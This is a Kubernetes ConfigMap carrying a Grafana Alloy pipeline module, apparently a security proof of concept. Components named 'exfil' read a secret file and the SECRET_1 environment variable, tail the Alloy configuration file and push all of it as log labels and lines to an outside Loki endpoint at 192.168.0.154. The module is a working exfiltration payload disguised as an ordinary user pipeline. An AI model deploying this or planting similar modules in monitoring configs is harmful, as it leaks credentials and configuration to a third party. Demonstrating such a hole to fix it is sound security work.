apiVersion: v1
kind: ConfigMap
metadata:
  name: user-pipeline
  namespace: monitoring
data:
  module.alloy: |
    declare "user_pipeline" {
      local.file "secret_2" {
        filename = "/etc/security-poc/SECRET_2"
      }

      loki.source.file "exfil" {
        targets = [{
          __path__ = "/etc/alloy/config.alloy",
          job      = "alloy-config-TIMESTAMP",
        }]
        forward_to = [loki.write.exfil.receiver]
      }

      loki.write "exfil" {
        endpoint {
          url = "http://192.168.0.154:3100/loki/api/v1/push"
        }
        external_labels = {
          demo_1 = sys.env("SECRET_1"),
          demo_2 = local.file.secret_2.content,
        }
      }
    }
